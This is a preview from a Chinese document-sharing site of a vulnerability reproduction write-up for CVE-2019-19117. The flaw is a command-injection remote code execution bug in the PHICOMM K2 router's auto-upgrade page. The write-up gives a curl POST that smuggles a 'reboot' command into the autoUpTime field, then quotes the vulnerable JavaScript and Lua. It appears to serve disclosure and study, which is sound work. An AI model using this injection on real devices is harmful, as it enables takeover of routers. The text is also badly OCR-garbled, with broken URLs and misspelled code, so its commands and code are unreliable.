《(CVE-2019-19117)PHICOMM 远程代码执行.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-19117)PHICOMM 远程代码执行.docx(2页珍藏版)》请在优知文库上搜索。
1、(CVE-2019-19117) PHICoMM 远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MM K2(PSG1218) V22.5.9.163三、复现过程受影响的源代码文件:usrliblualuciCOntroIIeiadminautoupgrade.lua受影响的函数:SaVe ()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权 限后,向设备发送精心制作的数据包curl -i -s -k -v -XPOST -e ,http:/192.168.2.lcgi-binluci;stok=x
2、x xxxxxxxxx -b sysauth=4a2c4bdba5fbl273ce62759fd42dba42 -data-bin ary mode=l&autoUpTime=02%3A051reboot http:/192.168.2.1/cgi-bin/luci /;stok=xxadminxxxxx,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。 Jj%qnq, i$(#WanCheCkmodaI). modal(show);$(N#autoUpTimeM)val($(#uptImehourN)val() : $(M#uptimeminM).val();SetT
3、imeout(fnction() document. save.submit ();, 1O);我们可以看到,将autoUpTime,的值直接分配给变量,而无需检查该值是否被恶意 修改,然后发送给服务器。function sve()local time = luci.http.forRvalue(,autoUpTtRe) local node Iuct.http.forRvalue(node) local upgrading = 1 if node = *l thenluct.sys.cll(uct set sytteR.autoupgrade.up.ttne%s % tine)Iuct.sy
4、s.call(Muct set systen.autoupgrade.uptype6(a)luct.sys.call(Nuct C0Rtt system,)SCheduletask.settaskatr(systenr HautoupgradeM, wltb auto upgrade.sh 9 yesM, m 16 ,up tine,)SCheduletask.cfgscdutskbyla(, add,* /system* /(autoupgrdde,) elsetf node = thenluct.sys.call(Nuct set systen.utouprde.up-typel)luct.sys.call(,uct CoRntt syste,t)Scheduletask. cfgscdutskbylua( del, /systen /,utoupgrde) endluci.http.redtrect(Iuct.dispatcher.butldaurI CadntnM ,nore_syssetM/autoupradeM),(node=Rde, upgrading upgrading ) end然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使 攻击者想要执行的命令附加到该命令。最后,路由器将执行命令reboot